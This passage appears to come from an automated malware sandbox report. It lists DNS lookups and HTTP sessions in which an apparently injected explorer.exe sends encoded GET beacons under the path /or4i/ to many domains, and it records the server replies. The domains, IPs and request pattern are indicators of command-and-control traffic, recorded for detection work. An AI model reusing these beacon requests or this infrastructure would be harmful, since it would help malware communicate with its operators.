                                                                                  May 12, 2021 20:04:19.542972088 CEST192.168.2.48.8.8.80x20bfStandard query (0)www.cuntrera.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:25.495456934 CEST192.168.2.48.8.8.80x111dStandard query (0)www.blissfulyogamullicahill.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:30.903311968 CEST192.168.2.48.8.8.80x8610Standard query (0)www.changethecompany.netA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  May 12, 2021 20:03:15.565867901 CEST8.8.8.8192.168.2.40x9f67No error (0)www.healshameyoga.compixie.porkbun.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:15.565867901 CEST8.8.8.8192.168.2.40x9f67No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:21.256314039 CEST8.8.8.8192.168.2.40x5ceeNo error (0)www.rogersbeefarm.comrogersbeefarm.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:21.256314039 CEST8.8.8.8192.168.2.40x5ceeNo error (0)rogersbeefarm.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:26.510171890 CEST8.8.8.8192.168.2.40x3912No error (0)www.nowhealthdays.comnowhealthdays.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:26.510171890 CEST8.8.8.8192.168.2.40x3912No error (0)nowhealthdays.com198.54.114.164A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:32.012048960 CEST8.8.8.8192.168.2.40xcf80No error (0)www.ikeberto.comikeberto.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:32.012048960 CEST8.8.8.8192.168.2.40xcf80No error (0)ikeberto.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:37.294027090 CEST8.8.8.8192.168.2.40x7424No error (0)www.directflence.comdirectflence.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:37.294027090 CEST8.8.8.8192.168.2.40x7424No error (0)directflence.com185.4.135.136A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:42.628508091 CEST8.8.8.8192.168.2.40x78bNo error (0)www.mmgenius.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:42.628508091 CEST8.8.8.8192.168.2.40x78bNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.16.197.4A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:42.628508091 CEST8.8.8.8192.168.2.40x78bNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com13.59.53.244A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:42.628508091 CEST8.8.8.8192.168.2.40x78bNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.15.160.167A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:47.999537945 CEST8.8.8.8192.168.2.40xce09No error (0)www.rainboxs.comrainboxs.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:47.999537945 CEST8.8.8.8192.168.2.40xce09No error (0)rainboxs.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:53.347131014 CEST8.8.8.8192.168.2.40x776cNo error (0)www.nobleandmarble.comnobleandmarble.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:53.347131014 CEST8.8.8.8192.168.2.40x776cNo error (0)nobleandmarble.com209.222.96.146A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:03.738435030 CEST8.8.8.8192.168.2.40x987eNo error (0)www.safegrinder.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:04:03.738435030 CEST8.8.8.8192.168.2.40x987eNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:09.111213923 CEST8.8.8.8192.168.2.40x5430No error (0)www.tecquestrian.comtecquestrian.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:04:09.111213923 CEST8.8.8.8192.168.2.40x5430No error (0)tecquestrian.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:14.373636007 CEST8.8.8.8192.168.2.40x8005No error (0)www.booweats.com64.190.62.111A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:19.890546083 CEST8.8.8.8192.168.2.40x20bfNo error (0)www.cuntrera.com154.93.81.33A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:25.639183998 CEST8.8.8.8192.168.2.40x111dNo error (0)www.blissfulyogamullicahill.com199.59.242.153A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:30.975553036 CEST8.8.8.8192.168.2.40x8610No error (0)www.changethecompany.netchangethecompany.netCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:04:30.975553036 CEST8.8.8.8192.168.2.40x8610No error (0)changethecompany.net34.102.136.180A (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.healshameyoga.com
                                                                                  • www.rogersbeefarm.com
                                                                                  • www.nowhealthdays.com
                                                                                  • www.ikeberto.com
                                                                                  • www.directflence.com
                                                                                  • www.mmgenius.com
                                                                                  • www.rainboxs.com
                                                                                  • www.nobleandmarble.com
                                                                                  • www.safegrinder.com
                                                                                  • www.tecquestrian.com
                                                                                  • www.booweats.com
                                                                                  • www.cuntrera.com
                                                                                  • www.changethecompany.net

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.44974444.227.76.16680C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:15.982130051 CEST1284OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG HTTP/1.1
                                                                                  Host: www.healshameyoga.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:16.190001965 CEST1285INHTTP/1.1 307 Temporary Redirect
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:03:16 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 168
                                                                                  Connection: close
                                                                                  Location: http://healshameyoga.com
                                                                                  X-Frame-Options: sameorigin
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.44975234.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:21.298877954 CEST1643OUTGET /or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.rogersbeefarm.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:21.436414003 CEST1673INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:03:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "6096ba97-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  10192.168.2.44977264.190.62.11180C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:04:14.421730995 CEST6051OUTGET /or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.booweats.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:04:14.499639034 CEST6052INHTTP/1.1 302 Found
                                                                                  date: Wed, 12 May 2021 18:04:14 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  content-length: 0
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_GR7H1xMTDQhvKsk9JLsRBf15xjVzhUxhlhUt6qvgKB5IoHIpJ3jjYusyTMFbvzyGzakXql8yj22nmafDt8NgEQ==
                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  pragma: no-cache
                                                                                  last-modified: Wed, 12 May 2021 18:04:14 GMT
                                                                                  location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                                  x-cache-miss-from: parking-5cc4cbb56f-5qv64
                                                                                  server: NginX
                                                                                  connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  11192.168.2.449773154.93.81.3380C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:04:20.187233925 CEST6053OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z HTTP/1.1
                                                                                  Host: www.cuntrera.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  12192.168.2.44977534.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:04:31.017971039 CEST6060OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR HTTP/1.1
                                                                                  Host: www.changethecompany.net
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:04:31.157010078 CEST6060INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:04:31 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "6096ba97-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  2192.168.2.449757198.54.114.16480C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:26.705135107 CEST2204OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi HTTP/1.1
                                                                                  Host: www.nowhealthdays.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:26.905880928 CEST2206INHTTP/1.1 404 Not Found
                                                                                  date: Wed, 12 May 2021 18:03:26 GMT
                                                                                  server: Apache
                                                                                  accept-ranges: bytes
                                                                                  transfer-encoding: chunked
                                                                                  content-type: text/html
                                                                                  connection: close
                                                                                  Data Raw: 32 31 36 38 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20
                                                                                  Data Ascii: 2168<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  3192.168.2.44976334.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:32.055988073 CEST5992OUTGET /or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.ikeberto.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:32.193681002 CEST5993INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:03:32 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "60995c0c-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  4192.168.2.449764185.4.135.13680C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:37.372333050 CEST6017OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx HTTP/1.1
                                                                                  Host: www.directflence.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:37.449553967 CEST6018INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Wed, 12 May 2021 18:03:37 GMT
                                                                                  Server: Apache
                                                                                  Location: https://www.directflence.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx
                                                                                  Cache-Control: max-age=2592000
                                                                                  Expires: Fri, 11 Jun 2021 18:03:37 GMT
                                                                                  Content-Length: 348
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 69 72 65 63 74 66 6c 65 6e 63 65 2e 63 6f 6d 2f 6f 72 34 69 2f 3f 34 68 5f 48 43 76 3d 61 32 4a 44 61 30 58 78 32 32 49 70 57 78 6a 50 26 61 6d 70 3b 48 46 51 44 45 4c 5f 38 3d 58 5a 35 65 67 46 6c 4d 34 4c 75 52 37 6a 75 63 30 55 46 50 36 66 61 69 2b 58 58 32 49 38 53 56 38 55 72 31 49 65 71 33 6f 4e 7a 57 34 62 2b 4f 43 53 6d 36 41 42 51 50 47 74 46 52 78 4a 58 72 30 36 6b 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.directflence.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&amp;HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx">here</a>.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  5192.168.2.4497653.16.197.480C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:42.767637014 CEST6019OUTGET /or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.mmgenius.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:42.905261993 CEST6020INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 12 May 2021 18:03:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 153
                                                                                  Connection: close
                                                                                  Server: nginx/1.16.1
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


